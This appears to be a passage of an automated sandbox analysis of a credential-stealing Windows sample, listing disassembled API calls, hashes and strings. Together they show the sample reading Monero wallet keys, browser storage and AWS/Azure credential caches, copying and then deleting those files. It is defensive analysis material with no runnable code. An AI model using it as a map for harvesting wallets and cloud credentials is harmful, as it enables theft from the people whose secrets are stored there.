                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                    • String ID: $%s%s$8
                                    • API String ID: 2672039231-1131050817
                                    • Opcode ID: eccec927b314552ca804fb56dd843c5cde405668776607d32b6b1622ba478afc
                                    • Instruction ID: cbefdda87e703ca2e60931d3c9b75734e76af4b8144dede1fe4859a4409bbd8d
                                    • Opcode Fuzzy Hash: eccec927b314552ca804fb56dd843c5cde405668776607d32b6b1622ba478afc
                                    • Instruction Fuzzy Hash: 1AF15D71D05114EFDB50DB68ED4CAEAB7B9EF48300F14859AF909E7261DB70AE41CBA0
                                    Function 000A1F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A1F9F
                                    • lstrlen.KERNEL32(00E68980), ref: 000A1FAE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1FDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A1FE3
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1FEE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A200E
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A201A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A2042
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A204D
                                    • lstrlen.KERNEL32(000D1794), ref: 000A2058
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A2075
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A2081
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A20AC
                                    • lstrlen.KERNEL32(?), ref: 000A20E4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A2104
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A2112
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A2139
                                    • lstrlen.KERNEL32(000D1794), ref: 000A214B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A216B
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A2177
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A219D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A21A8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A21D4
                                    • lstrlen.KERNEL32(?), ref: 000A21EA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A220A
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A2218
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A2242
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A227F
                                    • lstrlen.KERNEL32(00E6CDB8), ref: 000A228D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A22B1
                                    • lstrcat.KERNEL32(00000000,00E6CDB8), ref: 000A22B9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A22F7
                                    • lstrcat.KERNEL32(00000000), ref: 000A2304
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A232D
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000A2356
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A2382
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A23BF
                                    • DeleteFileA.KERNEL32(00000000), ref: 000A23F7
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000A2444
                                    • FindClose.KERNEL32(00000000), ref: 000A2453
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                    • String ID:
                                    • API String ID: 2857443207-0
                                    • Opcode ID: d0e817e6c20bc263c58d065ac31f6a9bc00458c41ddcb9c8fe9a867a171bc90e
                                    • Instruction ID: 0bbf74c85154d9d52ebc4c44cbae24ef1e89d819e32f3a9555693b4bf5f6ffe6
                                    • Opcode Fuzzy Hash: d0e817e6c20bc263c58d065ac31f6a9bc00458c41ddcb9c8fe9a867a171bc90e
                                    • Instruction Fuzzy Hash: B6E14F31A112169FCB21EFE8ED89AEE77F9AF16300F044035F905A7622DB34DD458BA1
                                    Function 000B6410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6445
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6480
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000B64AA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B64E1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6506
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B650E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6537
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FolderPathlstrcat
                                    • String ID: \..\
                                    • API String ID: 2938889746-4220915743
                                    • Opcode ID: 8be8abb71926c3e30d4574938ec041b0e74223dae07bf31495226c79b61f619a
                                    • Instruction ID: 173f831de2640e4a4d20a60ce39b38ef4c53ad3a0523fdaaf5f11da2e1b522a8
                                    • Opcode Fuzzy Hash: 8be8abb71926c3e30d4574938ec041b0e74223dae07bf31495226c79b61f619a
                                    • Instruction Fuzzy Hash: DDF19D70E116169BDB61EFA8D849AEE77F4AF05300F044139F859DB262EB39DC41CB91
                                    Function 000B4370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B43A3
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B43D6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B43FE
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B4409
                                    • lstrlen.KERNEL32(\storage\default\), ref: 000B4414
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4431
                                    • lstrcat.KERNEL32(00000000,\storage\default\), ref: 000B443D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4466
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B4471
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4498
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B44D7
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B44DF
                                    • lstrlen.KERNEL32(000D1794), ref: 000B44EA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4507
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B4513
                                    • lstrlen.KERNEL32(.metadata-v2), ref: 000B451E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B453B
                                    • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 000B4547
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B456E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B45A0
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 000B45A7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B4601
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B462A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B4653
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B467B
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B46AF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                    • String ID: .metadata-v2$\storage\default\
                                    • API String ID: 1033685851-762053450
                                    • Opcode ID: cd1cac6b5e01a003d705691a576bbcede8ba967ed23843524902acdd663ab07c
                                    • Instruction ID: 416f3d2b5cbf90985c794db13200070a7b7d1e8d30c49d4b003dbc1ffbdaeeb8
                                    • Opcode Fuzzy Hash: cd1cac6b5e01a003d705691a576bbcede8ba967ed23843524902acdd663ab07c
                                    • Instruction Fuzzy Hash: 39B16C31A116169BDB21EFB8E949AEF77E8AF11700F040139F845E7663EB34DE418B91
                                    Function 000B57A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B57D5
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 000B5804
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5835
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B585D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B5868
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5890
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B58C8
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B58D3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B58F8
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B592E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5956
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B5961
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5988
                                    • lstrlen.KERNEL32(000D1794), ref: 000B599A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B59B9
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B59C5
                                    • lstrlen.KERNEL32(00E6CDE8), ref: 000B59D4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B59F7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B5A02
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5A2C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5A58
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 000B5A5F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B5AB7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B5B2D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B5B56
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B5B89
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5BB5
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B5BEF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B5C4C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5C70
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 2428362635-0
                                    • Opcode ID: 3f648ed41aae5c7a493e17ec5593900617f73d110db08d5befdaf2cd7128ac3c
                                    • Instruction ID: 7cf5202d6813ac0c7b50e8c13825ec9c7ad4a2f11faa503ceba9711db99dd0f9
                                    • Opcode Fuzzy Hash: 3f648ed41aae5c7a493e17ec5593900617f73d110db08d5befdaf2cd7128ac3c
                                    • Instruction Fuzzy Hash: 6602CE70E016159FCB21EFA8DC89AEE7BF9AF04301F044179F849A7252DB30DC418B91
                                    Function 000A1190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000A1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000A1135
                                      • Part of subcall function 000A1120: RtlAllocateHeap.NTDLL(00000000), ref: 000A113C
                                      • Part of subcall function 000A1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 000A1159
                                      • Part of subcall function 000A1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 000A1173
                                      • Part of subcall function 000A1120: RegCloseKey.ADVAPI32(?), ref: 000A117D
                                    • lstrcat.KERNEL32(?,00000000), ref: 000A11C0
                                    • lstrlen.KERNEL32(?), ref: 000A11CD
                                    • lstrcat.KERNEL32(?,.keys), ref: 000A11E8
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A121F
                                    • lstrlen.KERNEL32(00E68980), ref: 000A122D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1251
                                    • lstrcat.KERNEL32(00000000,00E68980), ref: 000A1259
                                    • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 000A1264
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1288
                                    • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 000A1294
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A12BA
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A12FF
                                    • lstrlen.KERNEL32(00E6CDB8), ref: 000A130E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1335
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A133D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1378
                                    • lstrcat.KERNEL32(00000000), ref: 000A1385
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A13AC
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 000A13D5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1401
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A143D
                                      • Part of subcall function 000BEDE0: lstrcpy.KERNEL32(00000000,?), ref: 000BEE12
                                    • DeleteFileA.KERNEL32(?), ref: 000A1471
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                    • String ID: .keys$\Monero\wallet.keys
                                    • API String ID: 2881711868-3586502688
                                    • Opcode ID: b80f1530c804b1277dfc24a91559ffdffa5d51f688cb299b7c7e02f5963e2e98
                                    • Instruction ID: 77c8ef480052c4c0203667323cbc610eed0c94479b98ac96d7e7d8b727d1f569
                                    • Opcode Fuzzy Hash: b80f1530c804b1277dfc24a91559ffdffa5d51f688cb299b7c7e02f5963e2e98
                                    • Instruction Fuzzy Hash: 0EA19171E11215ABCB21EFF8EC89ADE77B9AF56300F044029F945E7252EB34DE418B91
                                    Function 000BE720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 000BE740
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 000BE769
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE79F
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BE7AD
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 000BE7C6
                                    • memset.MSVCRT ref: 000BE805
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 000BE82D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE85F
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BE86D
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 000BE886
                                    • memset.MSVCRT ref: 000BE8C5
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 000BE8F1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE920
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BE92E
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 000BE947
                                    • memset.MSVCRT ref: 000BE986
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$memset$FolderPathlstrcpy
                                    • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 4067350539-3645552435
                                    • Opcode ID: d9e9835a0077d8556c19c3f938d5645221694263dd9fc92b019d2a93dd569b90
                                    • Instruction ID: 393ca9fa0fd7192d6e86546f27938b07dae2b8be0bfa70722fe0fd27fd36bb82
                                    • Opcode Fuzzy Hash: d9e9835a0077d8556c19c3f938d5645221694263dd9fc92b019d2a93dd569b90
                                    • Instruction Fuzzy Hash: 3E71F971E40258AFDB61EBA4DC4AFED7374AF58700F0004A9B719AB1D1DF709E848B55
                                    Function 000BABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32 ref: 000BABCF
                                    • lstrlen.KERNEL32(00E6DDB0), ref: 000BABE5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAC0D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000BAC18
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAC41
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAC84
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000BAC8E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BACB7
                                    • lstrlen.KERNEL32(000D4AD4), ref: 000BACD1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BACF3
                                    • lstrcat.KERNEL32(00000000,000D4AD4), ref: 000BACFF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BAD28
                                    • lstrlen.KERNEL32(000D4AD4), ref: 000BAD3A
